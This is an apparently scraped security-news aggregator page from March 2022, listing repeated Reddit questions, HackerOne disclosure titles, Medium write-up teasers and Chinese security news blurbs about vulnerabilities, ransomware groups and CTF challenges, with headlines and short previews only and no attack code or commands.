    Some vendors offer firewall solutions for the cloud (mostly PA with VMSeries, CheckPoint with Quantum and Fortinet with Fortigate afaik). These are pretty much the same software/firmware they have on physical firewalls, but they virtualize it and put it on cloud instances, then you configure your traffic to go trough them. Do you use any of these solutions? If yes, why? Do you like them? I want to understand more about their benefits and downsides. What i can see as benefits are: More visibility (L7) and control over the CSP's native firewall Integrated threat intelligence and other AI/ML features Other bonus features (DNS security, for example) And downsides would be: Additional cost when you already have your CSP firewall for "free" Single point of failure, hard to setup and mantain (i think?) Same security benefits can be achieved using more cloud-native tooling (i think?) What do you think? Do you or would you use one of those? Personally i think the downsides outweight the benefits, but I would love to hear differing opinions. submitted by /u/lacioffi [link] [comments]
    I'm going to be going to hospital for a little while; I was planning to use RealVNC on my phone to use my home office while there. I'm assuming this will be okay to use for 2-3 weeks then i can uninstall it all?
    I don't know too much; forgive my ignorance. I've never had to do any remote-ing outside of my home office but I cannot avoid the surgery of course. submitted by /u/Buttercup59129 [link] [comments]
    Need an advice about my career
    Hi; I have a basic knowledge in programming but I can understand the code to a certain level. And I play CTF challenges, and I can say that I am a beginner but I have a good understanding of the flaws except I still struggle in exploiting some vulnerabilities. But in the matter of knowing what is happening I can tell a lot and identify vulnerabilities but I can't exploit all of them. I really need an advice or a suggestion about what can I do with my actual knowledge. And if I can use it to find a job according to my current level. Or I need to improve my skills more to find a job. (I really need a job asap) submitted by /u/xmrchaos [link] [comments]
    What features would make my ISO 27002 Explorer even better?
    I've created the ISO 27002 Explorer for information security professionals. You can use it to search through the ISO 27002 security controls and filter on different attributes. 👉️ What features should I add to make it even more useful? I already got the following suggestions on my original post: display the 2013 version controls a 2022 version control may replace –🙏🏻 u/dogpupkus, trying to add this by tomorrow; a button to remove filters – also u/dogpupkus – don't think that's possible on the #nocode platform I'm using; add the full control text – can't do that bc of copyright, though I'm thinking of adding translations, see this thread for an example; would I like a beer/coffee or something? 🍻 u/RHvdW very nice of you, you can help me by engaging with @iso27diy Have fun and let me know what you think! submitted by /u/But-I-Am-a-Robot [link] [comments]
    How does response manipulation via a mitm proxy like burp lead to bugs?
    https://ashutoshmishra00x0.medium.com/account-takeover-via-response-manipulation-worth-1800-ffb242cc55c9 Take this for example leads to an otp bypass and acccount take over setting success false to success true. Considering the response is just for the client to see how does this effect the server at all? Is the server sometimes programmed to poll specific endpoint responses and serve a page based on that? If so is there any interesting way to simulate this behavior in a local environment as maybe a capture the flag? I wanna see why and how it works so I can continue to find them more in the wild it just never made sense to me. Like requests is obvious the server parses the input and does transformations sometimes reflects it etc but responses I have no clue why spoofing responses would work. submitted by /u/Academic-Discount252 [link] [comments]
    Self-taught outside of the US
    Last time I asked you if it was possible to work in cyber security without being an ex-engineer, I got so many useful replies (thank you again!!) but I forgot to mention that I live in Europe (France). So now I’m once again losing hope because I don’t know if everything I’m learning will ever grant me a job. Here having a degree is mandatory so I’m stuck Do you know of people hired in the US coming from outside ? Are people still getting visa sponsorships or did that become exceptional ? And finally, what do you think of the IT industry in Canada ? Thanks again for helping me I’m by myself on this path so your advice is very valuable submitted by /u/No-Lead497 [link] [comments]
  • Open

    Ricochet reborn: We are building a user friendly TORChat (Ricochet) for GNU/Linux, MacOS and Windows
    submitted by /u/SpeekSecure [link] [comments]
    [CFP] Call for paper/tools/workshop for THREAT CON 2022 is now live
    submitted by /u/nyoface [link] [comments]
    OpenSSH phishing FIDO token protected keys (PoC)
    submitted by /u/ssh-mitm [link] [comments]
    A journey into IoT - Unknown Chinese alarm - Part 1 - Discover components and ports
    submitted by /u/0xdea [link] [comments]
    Multiple Vulnerabilities in GARO Wallbox
    submitted by /u/eddit__plus [link] [comments]
    RomHack 2022 CFP is Open!
    submitted by /u/smaury [link] [comments]
  • Open

    Playing with test fuzzing in Go
    Go 1.18 recently introduced test fuzzing, so I decided to give it a go (no no, I’m not making a stupid joke). Continue reading on Medium »
  • Open

    Playing with test fuzzing in Go
    Go 1.18 recently introduced test fuzzing, so I decided to give it a go (no no, I’m not making a stupid joke). Continue reading on Medium »
  • Open

    Incorrect Authorization Checks in /include/findusers.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081137
    Arbitrary File Deletion via Path Traversal in image-edit.php
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081878
    Potential Authentication Bypass through "autologin" feature
    ImpressCMS disclosed a bug submitted by egix: https://hackerone.com/reports/1081986
    Regexes with large repetitions on empty sub-expressions take a very long time to parse
    Internet Bug Bounty disclosed a bug submitted by addisoncrump: https://hackerone.com/reports/1518036 - Bounty: $4000
    The endpoint '/test/webhooks' is vulnerable to DNS Rebinding
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1379656 - Bounty: $100
    Race condition on action: Invite members to a team
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1285538 - Bounty: $100
    The endpoint /api/internal/graphql/requestAuthEmail on Khanacademy.or is vulnerable to Race Condition Attack.
    Khan Academy disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1293377
    Web Cache poisoning attack leads to User information Disclosure and more
    Lyst disclosed a bug submitted by deksterh1: https://hackerone.com/reports/631589 - Bounty: $300
    [https:///]&&[https:///] Open Redirection
    Lyst disclosed a bug submitted by mandark: https://hackerone.com/reports/537047 - Bounty: $300
    html injection via invite members can be leads account takeover
    Mattermost disclosed a bug submitted by rynexxx: https://hackerone.com/reports/1443567 - Bounty: $150
  • Open

    DEV-0537 criminal actor targeting organizations for data exfiltration and destruction - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]
    OffSecOps: Using Jenkins For Red Team Tooling
    submitted by /u/dmchell [link] [comments]
  • Open

    Secularism vs Individual Rights in Karnataka + Cost of Living in Spain + More
    On this 5th edition of the discursus Protest Analytics newsletter — March 22, 2022 Continue reading on discursus.io »
    Ukraine — Point de situation au 23 mars
    Les dernières 24h Continue reading on Medium »
  • Open

    Taco Bell Born X Raised Shirt
    Buy : https://teespring.com/en-GB/taco-bell-born-x-raised-shirt Continue reading on Medium »
  • Open

    Caso de uso não autorizados de chave da API do Google Maps
    Fala galera, Continue reading on Medium »
    The mystery of SQLMap’s --eval
    Master the power of exploiting most complex SQL injections Continue reading on InfoSec Write-ups »
    Stumbling into the bug of another
    The work of another bug hunter is staring back at you. Is your job half done? Continue reading on Medium »
  • Open

    Lsass.exe spawning werfault.exe
    Hi Folk, Today i found the suspicious behaviour on two DC's inside the network where, lsass.exe spawned the process of werfault.exe . While doing investigation i was not able to get any artifact that indicates that servers might be compromised. I detected this thing on SIEM and EDR logs doesn't mentions the process lineage. Can you people help me? submitted by /u/i_whiteheart [link] [comments]
    Autopsy for Network forensic analysis
    As far as I know tools like wiresharks, burpsuit are the go to application for network forensic. But When I am playing with autopsy I found out that it can get browser activities, cookies info. So are there more options to analyze network related activities through Autopsy? or any plugins that can be used for this purpose ? Edit : This might not makes sense probably and I have not find any articles related to the above online. I am just curious and love to know if it's an option submitted by /u/madladmary [link] [comments]
    Presentation topics
    I am an IR professional and I am doing a presentation to Digital Forensics students in a couple of months. Any recommendations for topics I should touch on? Any DF students out there have any suggestions on what they would like to hear from an IR person? submitted by /u/Digital_forensicator [link] [comments]
    GCIH or GCFA?
    I am looking to get my first GIAC cert and its between these two. I already have two years of cybsec experience as an analyst and have the a+, sec+ and cysa+ under my belt. I want to move on to something a little more challenging. I’d love to take a jab at GCFA but I am afraid its wayyyyy to advanced for me. How likely are you recommend someone to jump into this? Or would you recommend me going after a different cert before this? I am trying to sharpen my IR skills. submitted by /u/Enes_24 [link] [comments]
  • Open

    SecWiki News 2022-03-22 Review
    SecWiki周刊(第420期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-22 Review
    SecWiki周刊(第420期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Top 4 Books to learn Web Browser Security in 2022
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    OpenSSL BN_mod_sqrt() exploit published (CVE-2022-0778)
    Article URL: https://github.com/drago-96/CVE-2022-0778 Comments URL: https://news.ycombinator.com/item?id=30765727 Points: 1 # Comments: 0
  • Open

    关于如何更好地呈现红蓝对抗价值的思考
    虽然红蓝对抗机制和蓝军团队建设的经验和思考笔者已经通过不同渠道(博客、公众号、公开演讲等)多次分享了,但是今天 … 继续阅读关于如何更好地呈现红蓝对抗价值的思考 →
  • Open

    TryHackMe writeup: Alfred
    Here, I will use Jenkins as a vector to gain initial access to a target system and then use token impersonation for privilege escalation. Continue reading on InfoSec Write-ups »
    OTP Bypass and Account Takeover at Hospital
    No content preview
    How I created an undetectable Backdoor for Windows — Ethical Hacking
    No content preview
    Baron Samedit CVE-2021–3156 [TryHackMe]
    No content preview
  • Open

    TryHackMe writeup: Alfred
    Here, I will use Jenkins as a vector to gain initial access to a target system and then use token impersonation for privilege escalation. Continue reading on InfoSec Write-ups »
    OTP Bypass and Account Takeover at Hospital
    No content preview
    How I created an undetectable Backdoor for Windows — Ethical Hacking
    No content preview
    Baron Samedit CVE-2021–3156 [TryHackMe]
    No content preview
  • Open

    TryHackMe writeup: Alfred
    Here, I will use Jenkins as a vector to gain initial access to a target system and then use token impersonation for privilege escalation. Continue reading on InfoSec Write-ups »
    OTP Bypass and Account Takeover at Hospital
    No content preview
    How I created an undetectable Backdoor for Windows — Ethical Hacking
    No content preview
    Baron Samedit CVE-2021–3156 [TryHackMe]
    No content preview
  • Open

    FreeBuf早报 | LAPSUS$组织入侵微软DevOps帐户;牙科护理数据泄露,或影响一百万人
    LAPSUS$ 组织入侵了微软的 DevOps 帐户,声称可以访问微软的一些 DevOps 资源。
    “CryptoRom ” 骗局盯上了移动用户
    犯罪分子诱导受害者进行股票投资、赌博等,进行诈骗活动,这种行为被称为杀猪盘。
    黑客在推特上披露新版Conti勒索软件源代码
    近日,黑客在推特上公开披露了新版本Conti勒索软件源代码。
    与俄罗斯有关的InvisiMole组织对乌克兰发动鱼叉式网络钓鱼攻击
    乌克兰计算机紧急事件响应政府小组 (CERT-UA)声称UAC-0035组织针对乌克兰国家机构发起鱼叉式网络钓鱼邮件攻击。
    意大利数据隐私监管机构对卡巴斯基展开调查
    当局正核实这家俄罗斯安全公司究竟是如何处理本国用户数据,以及是否存在将收集到的信息转移到欧盟以外的地区。
    巨头杀手,Lapsus$勒索组织称入侵了Microsoft 源代码存储库
    在短短几个月的时间里,Lapsus$ 勒索组织成功入侵了NVIDIA 、三星、育碧、Mercado Libre 和沃达丰等其他知名公司。
    “1337”挖矿组织活动分析
    <h2 id="h2-1"><strong>1.概述</strong></h2><p>2022年2月初,哈工大安天联合C
  • Open

    JVM Shellcode 注入探索
    作者:p1ay2win@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A 前言 随着RASP技术的发展,普通webshell已经很难有用武之地,甚至是各种内存马也逐渐捉襟见肘。秉承着《JSP Webshell那些事——攻击篇(上)》中向下走的思路,存不存在一种在Java代码中执行机器码的方法呢?答案是肯定的,常见的注...
    毒蛇,禁止滑动 ! 新的后门攻击法国实体
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain 主要发现 Proofpoint 识别了一个有针对性的攻击,黑客利用一个开源软件包安装程序 Cho...
  • Open

    JVM Shellcode 注入探索
    作者:p1ay2win@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/5mK4twhCLtbiHdO0VZrX1A 前言 随着RASP技术的发展,普通webshell已经很难有用武之地,甚至是各种内存马也逐渐捉襟见肘。秉承着《JSP Webshell那些事——攻击篇(上)》中向下走的思路,存不存在一种在Java代码中执行机器码的方法呢?答案是肯定的,常见的注...
    毒蛇,禁止滑动 ! 新的后门攻击法国实体
    译者:知道创宇404实验室翻译组 原文链接:https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain 主要发现 Proofpoint 识别了一个有针对性的攻击,黑客利用一个开源软件包安装程序 Cho...

  • Open

    MRI pictures
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    A lot of anime, movies and shows
    https://setnomanime.me/0:/ submitted by /u/Isolatedleliel [link] [comments]
    Very Large OD full of software
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    What are the Best Security Testing Tools (Open Source)?
    Seeking a reliable security testing tool can be overwhelming, given how large the opsec environment has grown over these last few years. Given how large things have grown, it’s become common to overcharge people in the industry for security services provided. Due to this factor, it’s very beneficial for any small business or organization to consider their options in terms of free and open-source software available out there if on a budget. There are many free & open source security testing tools available out there, but the best places to look are with Github, reliable search engines, and within the infosec/opsec sphere of blogs and forums. Continue reading What are the Best Security Testing Tools (Open Source)? at Sucuri Blog.
  • Open

    Blue Team Junior Analyst Review
    Entry level blue team training courses from Security Blue Team Continue reading on Medium »
    Ukraine — Point de situation au 22 mars
    Les dernières 24h Continue reading on Medium »
  • Open

    Hedef Sistem veya Sistemler Hakkında Bilgi Toplama
    Merhaba arkadaşlar bu yazımda sizlere hedef veya hedefler hakkında bilgi toplama aşamasından ve bilgi toplama araçlarından bahsetmeye… Continue reading on Medium »
    Active Directory Certificate Services: Domain Dominance
    When I’m taking part in a penetration test or red team engagement, I love digging down into the intricacies of Active Directory… Continue reading on Medium »
  • Open

    what are the resources or references pentesters use to find exploits on known vulnerabilities?
    Thanks in advance, after doing a vuln scan and detecting new vulns, what do you do next to get the resources or information needed to exploit the vulnerability? submitted by /u/rleekc [link] [comments]
    Managed Security Services Recommendation
    Does anyone have any recommendations for some reputable MSSPs? We have looked at Trustwave and SecureWorks so far. Trustwave can manage our firewalls for us, but they lack endpoint security, whereas SecureWorks does endpoint security, but they do not manage firewalls. I am really looking for a company that will manage Palo Alto firewalls as well as do endpoint security. submitted by /u/Thavus [link] [comments]
    Intel lists for Cracked Software / Warez domains?
    Hey all, I had an idea about proactively ingesting lists of domains which are for cracked software / warez to block them in my proxy. While i could scrape search engines looking for sites, it would be easier if there was an intel list i could pull from daily that is already managed and kept up to date. Does anyone here know of such a list, or any better way to gather this data? Thanks submitted by /u/truedoom [link] [comments]
    AAA
    Hello everybody! I am new to the AAA server (ISE) and I would be thankful if you can suggest some videos that can explain it clearly for me as a beginner! Thank you. submitted by /u/Murky_Fee5417 [link] [comments]
    Best throwaway email service?
    I'm looking for an email service that allows for you to create an email address and use it for either sending emails briefly, using it to create an account that wont last long, or so on. I swear ProtonMail used to have a feature where email addresses can self destruct after a pre-determined amount of time, but I am not seeing this feature today. Can anyone recommend a good service that works like the above? submitted by /u/JamieOvechkin [link] [comments]
  • Open

    Unconstrained Delegation
    submitted by /u/netbiosX [link] [comments]
    Shielder - Reversing embedded device bootloader (U-Boot) - p.2
    submitted by /u/smaury [link] [comments]
    CVE-2022-0811 : New Vulnerability in CRI-O Engine Lets Attackers Escape Kubernetes Containers
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Unconstrained Delegation
    submitted by /u/netbiosX [link] [comments]
    Initial access via rtlo attack
    submitted by /u/exandroiddev [link] [comments]
  • Open

    Unconstrained Delegation
    Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
    Unconstrained Delegation
    Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
  • Open

    Unconstrained Delegation
    Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
    Unconstrained Delegation
    Microsoft to support scenarios where users authenticate via Kerberos to one system and information needs to be updated on another system implemented unconstrained delegation. This… Continue reading → Unconstrained Delegation
  • Open

    Log4j Java RCE in [beta.dev.adobeconnect.com]
    Adobe disclosed a bug submitted by sheikhrishad0: https://hackerone.com/reports/1442644
    Arbitrary file read via the bulk imports UploadsPipeline
    GitLab disclosed a bug submitted by vakzz: https://hackerone.com/reports/1439593 - Bounty: $29000
    Get all personal email IDs of Glassdoor users[No user interaction required]
    Glassdoor disclosed a bug submitted by safehacker_2715: https://hackerone.com/reports/864783 - Bounty: $1500
  • Open

    SecWiki News 2022-03-21 Review
    五十年跌宕起伏,恶意软件进化路 by Avenger 编写信息安全规划的几点经验 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-21 Review
    五十年跌宕起伏,恶意软件进化路 by Avenger 编写信息安全规划的几点经验 by ourren 更多最新文章,请访问SecWiki
  • Open

    OSINT — L’espion
    No content preview
    TryHackMe: Chocolate Factory Write-up
    No content preview
    What is Distributed Tracing and How does it work?
    No content preview
  • Open

    OSINT — L’espion
    No content preview
    TryHackMe: Chocolate Factory Write-up
    No content preview
    What is Distributed Tracing and How does it work?
    No content preview
  • Open

    OSINT — L’espion
    No content preview
    TryHackMe: Chocolate Factory Write-up
    No content preview
    What is Distributed Tracing and How does it work?
    No content preview
  • Open

    Log Sources for Digital Forensics: Windows and Linux
    submitted by /u/ogunal00 [link] [comments]
    APT35 Automates Initial Access Using ProxyShell
    submitted by /u/TheDFIRReport [link] [comments]
  • Open

    FreeBuf早报 | 2021年英国NFT诈骗案飙升400%;韩国黑客组织攻击澳门酒店
    FBI发布了一份联合网络安全公告,警告 AvosLocker 勒索软件针对美国多个关键基础设施的攻击。
  • Open

    Western Digital EdgeRover App: Elevated Privileges Windows, macOS CVE-2022-22998
    Article URL: https://www.bleepingcomputer.com/news/security/western-digital-app-bug-gives-elevated-privileges-in-windows-macos/ Comments URL: https://news.ycombinator.com/item?id=30749920 Points: 2 # Comments: 0
  • Open

    基于 tp240dvr 服务的新型反射攻击深度分析
    作者:百度安全实验室 原文链接:https://mp.weixin.qq.com/s/YCu8e6qkrq_3AxhVRd5ygQ 0x00 概述 2022年2月Cloudflare首次披露黑客利用tp240dvr(又称TP-240驱动程序)服务发起的新型反射放大攻击,放大倍数超过40亿,之后国内外多个安全团队针对此类攻击进行过解读。 百度智云盾在关注到此类攻击后,进行了深入分析,我们确认...
  • Open

    基于 tp240dvr 服务的新型反射攻击深度分析
    作者:百度安全实验室 原文链接:https://mp.weixin.qq.com/s/YCu8e6qkrq_3AxhVRd5ygQ 0x00 概述 2022年2月Cloudflare首次披露黑客利用tp240dvr(又称TP-240驱动程序)服务发起的新型反射放大攻击,放大倍数超过40亿,之后国内外多个安全团队针对此类攻击进行过解读。 百度智云盾在关注到此类攻击后,进行了深入分析,我们确认...

  • Open

    Pages banned by other pages is still able to take action on event(comment+post)
    Vuln Type Privacy / Authorization Continue reading on Medium »
    Wombat Exchange 漏洞賞金計劃正式上線
    贏取高達 US$100,000 的賞金! Continue reading on Wombat Exchange »
    Insecure Direct Object Reference
    Let us learn about IDOR Continue reading on Medium »
    What Is A Bug Bounty Program?
    Companies spend a part of their budget in different areas such as marketing to improve their position and people’s opinion, but there is… Continue reading on Medium »
    ultimate and advance way to find xss!
    What is XSS? Continue reading on Medium »
    fstScan — Massive Vulnerability scanner.
    fstScan is a fastest tool to scan an entire website. Continue reading on Medium »
    Launching Wombat Exchange Bug Bounty Program
    Get up to US$100,00 in Rewards! Continue reading on Medium »
    A Study of Double-Write Bypass for SQLMap — Tamper
    Introduction Continue reading on Medium »
    Broken session control leads to access private videos using the shared link even after revoking the…
    A lot of people might know how to share the private video and can access that video but here the interesting thing is now this… Continue reading on Medium »
    Top Ethical Hacking Tools and Software for 2022
    A detail blog on Top hacking tool which is used by skill hackers ! Continue reading on InfoSec Write-ups »
  • Open

    Linux EDR testing: simple to extend but realistic initial access test case and ideas where to focus when testing
    submitted by /u/4lreadytekken [link] [comments]
    GitHub - fgsect/FitM: FitM, the Fuzzer in the Middle, can fuzz client and server binaries at the same time using userspace snapshot-fuzzing and network emulation. It's fast and comparably easy to set up.
    submitted by /u/domenukk [link] [comments]
    Xepor: the web routing framework, brings the best of mitmproxy & Flask
    submitted by /u/ttimasdf [link] [comments]
  • Open

    Testing EDRs for Linux — Things I wish I knew before getting started
    Thoughts on how to simplify your tests while keeping it real and a realistic, easy to expand initial access case. Continue reading on Medium »
    LOLBINed — 360TotalSecurity (360AdvToolExecutor.exe)
    Very Total, Much Security Continue reading on Medium »
  • Open

    Ukraine — Point de situation au 21 mars
    Les dernières 24h Continue reading on Medium »
    Recon-ng: Powerful Reconaissance Tool
    Introduction Continue reading on Medium »
    A Sneak Peek into the Forbidden State: Exploring the CyberSpace of North Korea
    [0x0] The Beginning Continue reading on Medium »
    THE ART OF SOCK PUPPET
    Sock Puppet is an alternative online identity or in simple words it’s a Fake account Continue reading on Medium »
    OSINTGRAM : Gather Instagram Target Information (Step-by-Step Guide)
    In this guide I will be showing you how to install and use the functions of Osintgram in Kali Linux. Continue reading on System Weakness »
    US defense budget allocation for language interpretation
    https://www.youtube.com/watch?v=sr54QBU2lBc Continue reading on Medium »
  • Open

    Fully understand SYN Flood (TCP backlog and other stuff)
    Hey,I have multiple questions about the subject: I do know what port states are (Like listen,syn_recived, established, etc).But I don't understand exactly how the TCB queue works with them.Does the kernel open a new TCB every time the port state needs to be changed or something else? If so, does it necessarily needs to be a syn attack? it can be also an "ack" attack or every other state name attack. I think the only advantage is that syn is faster to send in massive traffic. I didn't understand if today the famous OS like RedHat Linux, windows server, windows home, etc do limit the backlog by default or not. I saw different sources say different things.Usually, organizations manually limit the TCP backlog (I know it depends), or just trust third-party systems like Big-IP of F5? IP and port spoofing is necessary for the attack? The victim's OS won't create a new TCB if I won't change my socket? If clause 2 is right, third party solutions also implement the same method of syn cookies on any other possible state? Thanks! submitted by /u/Webly99 [link] [comments]
    What should I use to share secret with someone of another company (client) ?
    In this case I can't have physical access to the person. submitted by /u/that_random_bear [link] [comments]
    Guide for how to design an account system?
    My company is overhauling its customer account system for our website, moving from simple username and password to having some form of 2FA. Now’s also a good time for us to go through all of our policies, such as the process for password reset, what to do if a customer no longer has access to their email, what to do if they no longer have access to their second-factor, if their phone number changed and they forgot to update it… lots of little questions that go into having a secure account system. Is there a book or long guide with current industry best practices? Thanks. submitted by /u/tvtb [link] [comments]
  • Open

    SecWiki News 2022-03-20 Review
    利用抽象语法树挖掘Fastjson可用的Gadget by ourren 利用 gateway-api 攻击 kubernetes by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-20 Review
    利用抽象语法树挖掘Fastjson可用的Gadget by ourren 利用 gateway-api 攻击 kubernetes by ourren 更多最新文章,请访问SecWiki
  • Open

    Creating a reverse C2 channel using powershell c# and python
    https://www.youtube.com/watch?v=Yoj0bQkIRqU submitted by /u/luzunov [link] [comments]
  • Open

    Courtesy of Republic of Bulgaria! - Part Three
    The nukes are coming! The nukes are coming!Enjoy!Related posts:Courtesy of Republic of Bulgaria! - Part TwoCourtesy of Republic of Bulgaria!A Profile of a Bulgarian Dipshit and a Kidnapper - An OSINT AnalysisAn Update on My Disappearance and Kidnapping Attempt Courtesy of Bulgarian Law Enforcement Officers from the City of Troyan Bulgaria Circa 2010 - An AnalysisWhat You Get From "Peasant-aria
  • Open

    Dirty Pipe Vulnerability in Linux
    Article URL: https://dietpi.com/blog/?p=1379 Comments URL: https://news.ycombinator.com/item?id=30741595 Points: 2 # Comments: 0
  • Open

    MyEnv := ZAP+Proxify+Burp
    여러분들은 보안 테스팅하실 떄 어떤 도구들을 사용하시나요? 저는 ZAP을 메인으로 그리고 Burpsuite를 보조 스캐너로 사용합니다. 제가 2021년 마지막글("나의 메인 Weapon 이야기")에 Proxify에 대해 언급을 했었습니다. 오늘은 이 Proxify를 이용하여 제가 새로 구성하려는 분석 환경과 이유, 그리고 이를 통해 더 얻고자 하는 것들에 대해 이야기하려고 합니다. Why 앞서 제가 분석 환경에 변화를 주려는 이유를 먼저 설명하겠습니다. 아주 오래전부터 분석에서 사용하는 데이터의 재 활용 필요성은 익히 알고 있었습니다. 그래서 여러가지로 고민을 해봤지만, 너무 크고 복잡한 그림만 나올 뿐 구축해서 잘 사용해볼 수 있는 형태의 그림은 없었죠.
  • Open

    Bulk Extractor showing Explicit Websites
    Howdy all, Okay, so whilst I was going through data of my client I found some explicit websites in the domain_histogram result from Bulk Extractor! Now, the thing that has me awake is, same link was available over at all hosts! So, I downloaded a fresh Iso Image from Windows official link, Made a Virtual Machine and Captured its ram! Found the same links xD I've no idea to what and how is this happening. Any leads anyone can help me with? submitted by /u/GloryHunter9 [link] [comments]
  • Open

    RXSS
    SecurityScorecard disclosed a bug submitted by ww1: https://hackerone.com/reports/1418413
    Insecure crossdomain.xml on https://vdc.mtnonline.com/
    MTN Group disclosed a bug submitted by xlife: https://hackerone.com/reports/838817
    Exposed .bash_history at http://21days2017.mtncameroon.net/.bash_history
    MTN Group disclosed a bug submitted by xlife: https://hackerone.com/reports/801437

  • Open

    Frelatage: A fuzzing library to find vulnerabilities and bugs in Python applications
    submitted by /u/FrenchFuzzer [link] [comments]
  • Open

    Ukraine — Point de situation au 20 mars
    Les dernières 24h Continue reading on Medium »
    OSINT — L’espion
    This short article presents my solution to the CTF challenge titled “L’espion”, an open source intelligence (OSINT) challenge available on… Continue reading on InfoSec Write-ups »
    Searchlight — IMINT
    Hello, blue teamers, Continue reading on Medium »
    HacktoriaWalkthrough — Hacktoria: Geolocation 27
    This time I´m gonna write another Writeup about Geolocation: Continue reading on Medium »
    Berlins hässlichste Business-Center — wo der Verfassungsschutz Büros anmietet
    Das Bundesamt für Verfassungsschutz betreibt in Deutschland Tarnbehörden, um seine Büros und Tätigkeiten möglichst schwer nachvollziehbar… Continue reading on Medium »
  • Open

    RAM Memory Analysis volatility
    Hi, I want to perform an analysis of the RAM of an Android phone using volatility, and for this I have a .bin file, a "System.map " and a "module.dwarf ". The tool I have to use is Volatility and I am not able to set the profile using the previous files to perform the analysis. Can someone please help me? Thanks submitted by /u/Zealousideal_Ad601 [link] [comments]
    Falcon Neo - Imaging
    Can someone let me know how falcon neo read/detect the source drive connected. submitted by /u/Pepperknowsitall [link] [comments]
  • Open

    Parent PID Spoofing (Mitre:T1134)
    Introduction Parent PID spoofing is an access token manipulation technique that may aid an attacker to evade defense techniques such as heuristic detection by spoofing The post Parent PID Spoofing (Mitre:T1134) appeared first on Hacking Articles.
  • Open

    Parent PID Spoofing (Mitre:T1134)
    Introduction Parent PID spoofing is an access token manipulation technique that may aid an attacker to evade defense techniques such as heuristic detection by spoofing The post Parent PID Spoofing (Mitre:T1134) appeared first on Hacking Articles.
  • Open

    Findsecret
    Merhaba arkadaşlar. Bugün sizlere Go programlama dili kullanarak geliştirdiğim bir aracı tanıtacağım. Continue reading on Medium »
    Echidna 漏洞賞金計劃
    賺取高達 $50,000 的賞金 Continue reading on Medium »
    Metasploit
    Anatomy and Structure of Metasploit Basic commands and configuration  Scanning services with Metasploit  Meterpreter basics Continue reading on Medium »
    BugBounty: H T M L Injection
    (Do you want to create your own hacking tools? Do you want to create a tool that can be undetectable by antivirus, can hack any windows… Continue reading on Medium »
    Web Hacking: A drama
    Part-One: An arrogant web app. Continue reading on Medium »
  • Open

    SecWiki News 2022-03-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-19 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Browser in the Browser
    submitted by /u/dmchell [link] [comments]
  • Open

    Where to focus further learning?
    Working in cyber I realized my knowledge is inch deep and a mile wide when it comes to technology. I've earned my ECIH, Sec+ and recently provisionally passed my CISSP. I have only 4 year experience and in a security management role. I definitely feel like I have imposter syndrome at times and want to build my technical knowledge but there is just SO much out there to learn. Where do you feel it's most important to focus attention when leading an IR/Blue Team? My overall goal is to advance I'm cyber/IT management by landing a director role and more long term CISO. Any thoughts or advice here? submitted by /u/gnomeparadox [link] [comments]
    Find hostnames in DNS records
    I'm doing a penetration test, I've tried brute forced the customer's domain to find hostnames. I'm sure there are others that exist but I can't find them. They are a fairly global company. I know they'll have users and customers all over the world requesting various apps. Is there a way to identify hostnames through public sources? I mean, is there a DNS server (like 1.1.1.1) that disclosures the DNS records people have requested? Or something like this? submitted by /u/InternalCode [link] [comments]
  • Open

    Asking for help
    Hello guys , could you recommend me some learning material or roadmap as I want to learn exploit development , what to learn and etc, thank you in advance. submitted by /u/Shokhjakhon23235 [link] [comments]
    Exploit dev on Windows Subsystem for Linux 2 possible?
    Hello all. I have a question for which I cannot find information on google. I would like to learn how to write simple exploits for linux and I wonder if I can do it using WSL2, is this technology suitable for Linux exploit development training? Thanks submitted by /u/JunkieChunkie [link] [comments]
  • Open

    FreeBuf 早报 | 钓鱼软件利用对乌入侵获取加密货币;欧洲警告与俄入侵有关飞机GPS中断
    CISA与FBI今天表示,他们正意识到美国和世界各地的卫星通信网络面临“可能的威胁”。
  • Open

    CVE-2022-27226: CSRF to RCE in iRZ Mobile Routers through 2022-03-16
    Article URL: https://johnjhacking.com/blog/cve-2022-27226/ Comments URL: https://news.ycombinator.com/item?id=30730055 Points: 2 # Comments: 0
  • Open

    LOLBINed — CyberGhost VPN (PeLauncher.exe/Dashboard.exe)
    Ghostbusters Continue reading on Medium »

  • Open

    Favicon Hash ile Phishing web siteleri nasıl bulunur
    Bug bounty, savunmasız web sitelerini bulmak için Favicon’un Hash’ini kullanır. Yazılımın farklı sürümleri bazen farklı Favicon… Continue reading on Medium »
    Software: Uncover
    In an article published on blackhatethicalhacking.com we’re introduced to the nifty tool Uncover. Continue reading on Medium »
    Ukraine — Point de situation au 19 mars
    Les dernières 24h Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 24
    This morning I decided to make a Geolocalization exercise in Hacktoria. Continue reading on Medium »
  • Open

    PIN BYPASS
